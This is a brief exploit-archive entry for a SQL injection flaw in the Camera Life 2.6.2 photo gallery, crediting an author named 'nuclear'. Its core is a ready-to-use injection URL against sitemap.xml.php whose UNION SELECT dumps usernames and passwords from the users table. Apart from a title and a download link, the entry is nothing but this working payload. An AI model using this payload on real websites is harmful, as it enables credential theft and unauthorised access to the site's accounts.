id: 3447
date: 07/24/2008
title: Camera Life 2.6.2 (id) Remote SQL Injection Vulnerability
author: nuclear
cves: 

=========================================================
Camera Life 2.6.2 (id) Remote SQL Injection Vulnerability
=========================================================



#Camera Life 2.6.2(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip



#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --



#  0day.today [2023-03-26]  #